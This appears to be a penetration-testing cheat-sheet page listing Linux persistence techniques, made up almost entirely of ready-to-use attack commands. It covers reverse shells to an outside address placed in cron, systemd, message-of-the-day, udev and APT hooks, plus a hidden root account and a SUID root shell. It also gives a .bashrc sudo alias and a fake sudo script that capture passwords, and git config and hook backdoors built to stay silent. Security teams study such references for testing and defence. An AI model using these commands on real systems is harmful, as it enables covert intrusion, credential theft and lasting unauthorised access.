Skip to content

Linux - Persistence

Summary

Basic Reverse Shell

ncat --udp -lvp 4242
ncat --sctp -lvp 4242
ncat --tcp -lvp 4242

Add a Root User

sudo useradd -ou 0 -g 0 john
sudo passwd john
echo "linuxpassword" | passwd --stdin john

SUID Binary

TMPDIR2="/var/tmp"
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
rm $TMPDIR2/croissant.c
chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant

Crontab

Crontab (short for cron table) is a configuration file for scheduling tasks (cron jobs) in Unix-like systems. It allows users to automate repetitive commands at specific times or intervals.

A crontab entry follows this format:

* * * * * command-to-execute
| | | | |
| | | | └── Day of the week (0-7, Sunday = 0 or 7)
| | | └──── Month (1-12)
| | └────── Day of the month (1-31)
| └──────── Hour (0-23)
└────────── Minute (0-59)

Run a script every time the system reboots.

(crontab -l ; echo "@reboot sleep 200 && ncat 10.10.10.10 4242 -e /bin/bash")|crontab 2> /dev/null

Bash Configuration File

The ~/.bashrc file is a user-specific configuration script for Bash (Bourne Again Shell). It runs automatically whenever a new interactive, non-login shell is opened (e.g., when opening a terminal).

Example of a backdoor in .bash_rc where a reverse shell is triggered when the user is using the sudo command:

TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
cat << EOF > /tmp/$TMPNAME2
  alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale  = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale  = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
EOF
if [ -f ~/.bashrc ]; then
    cat /tmp/$TMPNAME2 >> ~/.bashrc
fi
if [ -f ~/.zshrc ]; then
    cat /tmp/$TMPNAME2 >> ~/.zshrc
fi
rm /tmp/$TMPNAME2

Add the following line inside the user's .bashrc file to hijack the sudo command and write the content of the input into /tmp/pass.

chmod u+x ~/.hidden/fakesudo
echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc

Finally, create the fakesudo script.

read -sp "[sudo] password for $USER: " sudopass
echo ""
sleep 2
echo "Sorry, try again."
echo $sudopass >> /tmp/pass.txt

/usr/bin/sudo $@

Startup Service

Edit /etc/network/if-up.d/upstart file

RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart

Systemd User Service

Create a service file in ~/.config/systemd/user/.

vim ~/.config/systemd/user/persistence.service

Add the following configuration:

[Unit]
Description=Reverse shell[Service]
ExecStart=/usr/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Restart=always
RestartSec=60[Install]
WantedBy=default.target

Enable service and start service:

systemctl --user enable persistence.service
systemctl --user start persistence.service

Systemd Timer File

A Systemd Timer is a way to schedule tasks (like cron jobs) using Systemd instead of cron. It works alongside a corresponding service file to execute commands at specific intervals or times.

Create a timer file : /etc/systemd/system/backdoor.timer

[Unit]
Description=Backdoor Timer

[Timer]
OnBootSec=5min
OnUnitActiveSec=1h

[Install]
WantedBy=timers.target

Create a Corresponding Service Unit File: /etc/systemd/system/backdoor.service

[Unit]
Description=Backdoor Service

[Service]
Type=simple
ExecStart=/bin/bash /opt/backdoor/backdoor.sh

Enable and Start the Timer

sudo systemctl enable shout.timer
sudo systemctl start shout.timer

Message of the Day

Edit /etc/update-motd.d/00-header file

echo 'bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"' >> /etc/update-motd.d/00-header

User Startup File

The ~/.config/autostart/ directory is used in Linux desktop environments (like GNOME, KDE, XFCE) to automatically start applications when a user logs in.

Each startup program is defined using a .desktop file placed in this directory.

[Desktop Entry]
Type=Application
Name=Custom Script
Exec=/home/user/scripts/startup.sh
Hidden=false
NoDisplay=false
X-GNOME-Autostart-enabled=true

Udev Rule

Udev is the device manager for the Linux kernel, responsible for dynamically handling device events. It can be exploited for persistence by executing a script whenever a specific device is plugged in.

echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null

After saving the rule file, reload the udev rules:

sudo udevadm control --reload-rules
sudo udevadm trigger

APT Configuration

If you can create a file on the apt.conf.d directory with:

APT::Update::Pre-Invoke {"CMD"};

Next time "apt-get update" is done, your CMD will be executed!

echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor

SSH Configuration

Add an SSH key into the ~/.ssh folder.

  1. Generate a new key with ssh-keygen
  2. Write the content of ~/.ssh/id_rsa.pub into ~/.ssh/authorized_keys
  3. Set the right permission

  4. 700 for ~/.ssh

  5. 600 for authorized_keys

Git Configuration

Backdooring git can be a useful way to obtain persistence without the need for root access.
Special care must be taken to ensure that the backdoor commands create no output, otherwise the persistence is trivial to notice.

Git Configuration Variables

There are multiple git configuration variables that execute arbitrary commands when certain actions are taken.
As an added bonus, git configs can be specified multiple ways leading to additional backdoor opportunities.
Configs can be set at the user level (~/.gitconfig), at the repository level (path/to/repo/.git/config), and sometimes via environment variables.

core.editor is executed whenever git needs to provide the user with an editor (e.g. git rebase -i, git commit --amend).
The equivalent environment variable is GIT_EDITOR.

[core]
editor = nohup BACKDOOR >/dev/null 2>&1 & ${VISUAL:-${EDITOR:-emacs}}

core.pager is executed whenever git needs to potentially large amounts of data (e.g. git diff, git log, git show).
The equivalent environment variable is GIT_PAGER.

[core]
pager = nohup BACKDOOR >/dev/null 2>&1 & ${PAGER:-less}

core.sshCommand is executed whenever git needs to interact with a remote ssh repository (e.g. git fetch, git pull, git push).
The equivalent environment variable is GIT_SSH or GIT_SSH_COMMAND.

[core]
sshCommand = nohup BACKDOOR >/dev/null 2>&1 & ssh
[ssh]
variant = ssh

Note that ssh.variant (GIT_SSH_VARIANT) is technically optional, but without it git will run sshCommand twice in rapid succession. (The first run is to determine the SSH variant and the second to pass it the correct parameters.)

Git Hooks

Git hooks are programs you can place in a hooks directory to trigger actions at certain points during git's execution.

By default, hooks are stored in a repository's .git/hooks directory and are run when their name matches the current git action and the hook is marked as executable (i.e. chmod +x).
Potentially useful hook scripts to backdoor:

  • pre-commit is run just before git commit is executed.
  • pre-push is run just before git push is executed.
  • post-checkout is run just after git checkout is executed.
  • post-merge is run after git merge or after git pull applies new changes.

In addition to spawning a backdoor, some of the above hooks can be used to sneak malicious changes into a repo without the user noticing.

Lastly, it is possible to globally backdoor all of a user's git hooks by setting the core.hooksPath git config variable to a common directory in the user-level git config file (~/.gitconfig). Note that this approach will break any existing repository-specific git hooks.

Additional Persistence Options

References